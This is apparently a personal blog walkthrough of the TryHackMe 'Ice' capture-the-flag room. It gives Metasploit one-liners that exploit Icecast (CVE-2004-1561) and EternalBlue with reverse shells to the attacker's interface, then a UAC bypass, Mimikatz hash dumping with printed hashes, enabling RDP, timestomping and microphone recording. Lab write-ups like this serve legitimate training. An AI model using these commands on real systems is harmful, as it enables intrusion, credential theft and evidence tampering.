Tim Sonner

TryHackMe - Ice

Published: 2023-07-08

Recon

Nmap service scan

nmap -sV -vv $IP

This room covers the service running on port 8000 (Icecast).

Nmap vulnerability scan

nmap -script=vuln -vv $IP

This box is also vulnerable to Eternal Blue (ms17-010) CVE-2017-0143.

Research the exploit. The room wants us to research a specific CVE from 2004.

cvedetails.com results for “Icecast”

Hmmm… No CVE results from 2004.

exploit-db.com results for “Icecast”

The correct CVE is linked in the exploit-db results (2004-10-6 or 2004-10-12)

ChatGPT results for Icecast vulnerabilities from 2004

We now know the CVE in question is CVE-2004-1561.

cvedetails.com results for CVE-2004-1561

The vulnerability allows us to “Execute Code” by leveraging a buffer “Overflow”.

Digging a bit deeper… searchsploit results for “Icecast”

View the exploit

cat /usr/share/exploitdb/exploits/windows_x86/remote/16763.rb

Exploit

Metasploit search results for “icecast”

Metasploit command

msfconsole -x "use exploit/windows/http/icecast_header;setg RHOSTS $IP;setg LHOST tun0;run"

Note tun0 may not be the only tun interface. Run ‘ip addr’ to view interfaces, command above may need tun1.

The exploit has ran. Get our user ID and view the icecast process

We get the same PID if we run getpid. That process is us.

View all processes

Elevate our privileges

View our privileges

getprivs

Get suggested exploits

run post/multi/recon/local_exploit_suggester

Use a suggested exploit

use exploit/windows/local/bypassuac_eventvwr

Once the exploit has ran, view our sessions, 2 is elevated

Our user ID is the same as in the un-elevated session

Our privileges in the elevated session are different

View processes in the elevated session. Notice different results between sessions? Our privileged shell can view owners of all processes

Migrate to another process

Load Mimikatz aka Kiwi

Get credentials

Dump the hashes with “hashdump”

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Spin up an RDP session utilizing the user Dark’s credentials to authenticate

run post/windows/manage/enable_rdp

This opens the RDP port and starts the service on the target if not already enabled.

rdesktop $IP

Remote desktop, just give it an IP. This command is ran on the localhost of course.

View the target’s desktop in real time in a browser window.

screenshare

Mess with timestamps.

timestomp desktop.ini -m "07/08/2023 15:30:00"

Record audio from the taget device’s microphone.

record_mic

Don’t think this works on this box…

Create a Kerberos golden ticket to take you where you’re going in life…

golden_ticket_create

load kiwi is required for this command. Also, this box isn’t domain joined.

Let’s p0wn the box using the eternal blue exploit

msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue;setg RHOSTS $IP;setg LHOST tun0;run"

Ridiculously EZ.

Here’s an exploit to try out and work on…

Icecast 2.0.1 (Win32) - Remote Code Execution (1)

https://www.exploit-db.com/exploits/568

Here’s a copy of ncat.exe in case we want to rewrite the exploit…

https://timsonner.com/ncat.exe

Donezo Funzo.